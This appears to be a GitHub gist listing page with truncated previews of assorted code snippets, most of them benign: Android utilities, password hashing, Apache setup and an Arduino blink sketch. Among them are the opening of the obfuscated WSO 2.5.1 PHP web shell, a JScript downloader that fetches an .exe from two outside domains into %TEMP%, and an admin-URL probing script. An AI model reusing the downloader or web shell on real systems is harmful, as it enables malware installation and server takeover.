This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using Microsoft.Win32; | |
using System; | |
using System.Collections.Generic; | |
using System.Diagnostics; | |
using System.Linq; | |
using System.Runtime.InteropServices; | |
using System.Windows.Forms; | |
namespace VPZ.Security | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include "stdafx.h" | |
#include "blocker.h" | |
namespace VPZ | |
{ | |
namespace Security | |
{ | |
Blocker::Blocker(IntPtr Handle) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package com.vaibhavpandey.utility; | |
import com.vaibhavpandey.demo.BuildConfig; | |
import android.text.TextUtils; | |
import android.util.Log; | |
public final class Lograt { | |
/** |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/** | |
* Simple script to find possible admin URLs for a given domain | |
* Replace [ .* ] with array( .* ) if running PHP < 5.4 (if found) | |
* By Vaibhav Pandey <[email protected]> | |
*/ | |
define('REGEX_DOMAIN', '/^(([a-zA-Z]{1})|([a-zA-Z]{1}[a-zA-Z]{1})|([a-zA-Z]{1}[0-9]{1})|([0-9]{1}[a-zA-Z]{1})|([a-zA-Z0-9][a-zA-Z0-9-_]{1,61}[a-zA-Z0-9]))\.([a-zA-Z]{2,6}|[a-zA-Z0-9-]{2,30}\.[a-zA-Z]{2,3})$/'); | |
function __code($uri) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import java.security.MessageDigest; | |
import android.content.Context; | |
import android.content.pm.PackageInfo; | |
import android.content.pm.PackageManager; | |
import android.content.pm.Signature; | |
import android.util.Base64; | |
class Signature { | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/** | |
* v2.5.1 | |
* Hosted at: http://pastebin.com/BXmWGhMu (Line: #1037) | |
* Hosted at: http://snipplr.com/view/70661/ (Line: #1037) | |
* Hosted at: http://dl.packetstormsecurity.net/UNIX/penetration/rootkits/wso2.5.1.zip (Line: #1037) | |
* Hosted at: http://pastebin.com/KCtz6XA9 (Line: #1037) | |
*/ | |
// Obfuscated | |
$x10 = "\x6dai\154"; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
(function() { | |
var urls = [ | |
'http://wherareyoufromff.com/25.exe', | |
'http://arendroukysdqq.com/25.exe' | |
]; | |
var shell = WScript.CreateObject('WScript.Shell'); | |
var xmlhttp = WScript.CreateObject('MSXML2.XMLHTTP'); | |
var stream = WScript.CreateObject('ADODB.Stream'); | |
var tmp = shell.ExpandEnvironmentStrings('%TEMP%\\'); | |
var file = tmp + 4194304 + '.exe'; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/** | |
* @param string $plain | |
* @param string $algo | |
* @param int $iterations | |
* @param int $saltlen | |
* @param int $keylen | |
* @return string | |
*/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash | |
APACHE_USER=wwwhost | |
VHOSTS_DOMAINS=(example.com second.example.com) | |
sudo ufw allow in "OpenSSH" | |
# Install Apache | |
sudo apt-get update | |
sudo apt-get install apache2 | |
sudo nano /etc/apache2/apache2.conf # Add ServerName ... directive at bottom |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
int BLINK_SPEED_MS = 250; | |
int PIN_N = 15; | |
void setup() { | |
// put your setup code here, to run once: | |
pinMode(PIN_N, OUTPUT); | |
} | |
void loop() { | |
// put your main code here, to run repeatedly: |
OlderNewer